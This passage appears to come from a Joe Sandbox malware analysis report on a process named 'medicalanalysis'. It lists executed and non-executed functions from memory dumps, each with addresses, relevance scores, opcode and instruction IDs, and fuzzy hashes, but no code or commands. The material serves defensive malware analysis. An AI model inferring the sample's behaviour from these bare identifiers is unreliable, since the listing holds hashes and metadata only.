                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8D0A9310401889FCB108F19CC40E987B74EB09221B0440A1FE088B222C232A920CA45
                                                                                                                                                                                                                                                                                                                Function 058C72BF Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: afc3afe8d2b9ccbc8017a4bb2bce3b9add3e43b3d490c305a997819b76aca70e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 586c0d9660b72fa0ddb6e98d5d8b9048f64c8d81c3772c07db7e0455c4caf83e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: afc3afe8d2b9ccbc8017a4bb2bce3b9add3e43b3d490c305a997819b76aca70e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AD067749003188FCB50EF14D9447997BB1BB0A304F2050D8D95DA2359C7305D858F15
                                                                                                                                                                                                                                                                                                                Function 058936F0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6558e489aae903e2ce9f75a700a338f5249dc4733a2352c0267e0bbd25ed59a3
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6ca9107f3886ebc2f0dd8fc52b4ea9a91880463b5c07f7972c9fc0f51902a13a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6558e489aae903e2ce9f75a700a338f5249dc4733a2352c0267e0bbd25ed59a3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01B092B6944240EAEF1A2500CD0F7803C908350701F5808086E0AD53CAE9A168405813
                                                                                                                                                                                                                                                                                                                Function 058C9D11 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: fd4ceebfe6215506859d3182b48115021a0ac38623b75ea49686eead4077f8fd
                                                                                                                                                                                                                                                                                                                • Instruction ID: ab95a998c546104a988d3f5cd3f05c39c9177cf84e4c6090a27b787eae6fa83e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd4ceebfe6215506859d3182b48115021a0ac38623b75ea49686eead4077f8fd
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EED0C97094161ACFDB20EF24DD44F9EBBB1AB02305F00A6E6890DA7264DB306E85CF01
                                                                                                                                                                                                                                                                                                                Function 058C7ACD Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: a204ca7a7adf586f878a1afc91a8fa12e01fd61b305ba399f6e8888113340856
                                                                                                                                                                                                                                                                                                                • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a204ca7a7adf586f878a1afc91a8fa12e01fd61b305ba399f6e8888113340856
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                                                                                                                                                                                                                                                                                Function 058965F1 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: e4ae2d557ad552486af5c7221cf56e8d9bba5f08e00697ec866e4c1670aa1f77
                                                                                                                                                                                                                                                                                                                • Instruction ID: a98d9d7ffec1e1d359dae146d2468b6312ad384f56384a64ca6541e484490947
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4ae2d557ad552486af5c7221cf56e8d9bba5f08e00697ec866e4c1670aa1f77
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26C02B304251C09DC302871C9C07736BE20F3606C0F008C2AF0408315ECB301420C391
                                                                                                                                                                                                                                                                                                                Function 0589F870 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                                                                                                                                                                                • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                                                                                                                                                                                                                                Function 00A717A8 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0831e701e3342335a8b8938458d7ef58f03d3aacbbe4d4a9a0fa86e6e09f45f3
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2f1e8bd9b83f1e16fc65a764ea09ed681d77e8029bd8ba37dc50c1792cd99998
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0831e701e3342335a8b8938458d7ef58f03d3aacbbe4d4a9a0fa86e6e09f45f3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44A0122498070E4F890073F9241803837AC36441003C00060F40E42200DD6454010180
                                                                                                                                                                                                                                                                                                                Function 00A708B0 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 369dcfa5cc7f34610a9e4fab9b976a3ba17863618a505dc11df808e96c0f5dc7
                                                                                                                                                                                                                                                                                                                • Instruction ID: d6e38be8bec01b40390dcb6c600afa0b95333f08d3eb03d1fa942b7eb6b41774
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 369dcfa5cc7f34610a9e4fab9b976a3ba17863618a505dc11df808e96c0f5dc7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93902230080A0CCF0A0023E8380C030330CF0000003C00020F00C000000A2020020080

                                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                                Function 04AA0DD5 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2853288774.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_4aa0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0b335ad08f7bee62ea2e8266fd28bfa9973b6339e9fcc8c4ff74dd6d9a8e0a65
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8d9c4667199618082840c7c85325a3ace14239d855e4e88ee397988d6d7d49f7
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b335ad08f7bee62ea2e8266fd28bfa9973b6339e9fcc8c4ff74dd6d9a8e0a65
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7641F0B4D043589FDB24CFA9D884A9EBFF1BB09304F24912AE854BB250D775A885CF45
                                                                                                                                                                                                                                                                                                                Function 04AA0DE0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2853288774.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_4aa0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1b5a1c71dbc95ac053576c2677c929cd46fe6d264465a6f584db425970a915eb
                                                                                                                                                                                                                                                                                                                • Instruction ID: ef6bceae4cbba7cb729877b32f62afbcfc754c0353d626829dce960ca9103445
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b5a1c71dbc95ac053576c2677c929cd46fe6d264465a6f584db425970a915eb
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5241D1B4D043589FDB24CFA9D884B9EFBF1BB09314F209129E815BB250D775A885CF85
                                                                                                                                                                                                                                                                                                                Function 0571DDA8 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2856559742.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5710000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: d8dfbe8679d448e1a4570b51a3940e7a3c931528bf06e23d7c0dedf649198141
                                                                                                                                                                                                                                                                                                                • Instruction ID: f6287cbd8c5e870c807f6bde49d0be4d1ccaa3cfcb6465db3bc23d30c00b9280
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8dfbe8679d448e1a4570b51a3940e7a3c931528bf06e23d7c0dedf649198141
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B21E2B5D042189FCB14CFA9D984ADEFBF0FB49310F14902AD845B7210C7356945CFA8
                                                                                                                                                                                                                                                                                                                Function 0571DDB0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2856559742.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5710000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0da487f241f41407e46daedd0e54206de0e4725b2637bb200bbf860b7bad36c4
                                                                                                                                                                                                                                                                                                                • Instruction ID: fcdbb753be958a5098d385be9d364b7507007387a3517eae7ec8ed07ddf0f7b1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0da487f241f41407e46daedd0e54206de0e4725b2637bb200bbf860b7bad36c4
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1321CDB5D042189FCB14CFA9D984AEEFBF5BB49320F10902AE805B7250C735A945CFA8
                                                                                                                                                                                                                                                                                                                Function 0589BF30 Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-463314800
                                                                                                                                                                                                                                                                                                                • Opcode ID: ba738f95f87b997b4f10239a75ce3bf2e0b43c7eb5ad5bef2bd23f0970d7d6e9
                                                                                                                                                                                                                                                                                                                • Instruction ID: 575555397215c061c642f9f4989f5f022b83b2f9867573ae2d28fa21aa77175c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba738f95f87b997b4f10239a75ce3bf2e0b43c7eb5ad5bef2bd23f0970d7d6e9
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB5181306402098FCB08DF7989506AFBBE7BFC8340F148969D54997399DF35ED468BA1